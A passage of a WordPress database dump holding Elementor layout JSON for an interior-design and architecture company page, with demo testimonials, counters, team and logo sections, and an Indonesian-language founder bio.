2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3901,4875,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3902,4875,'_elementor_pro_version','3.8.1'),(3903,4876,'_wp_page_template','elementor_header_footer'),(3904,4876,'_elementor_edit_mode','builder'),(3905,4876,'_elementor_template_type','wp-page'),(3906,4876,'_elementor_version','3.8.1'),(3907,4876,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - 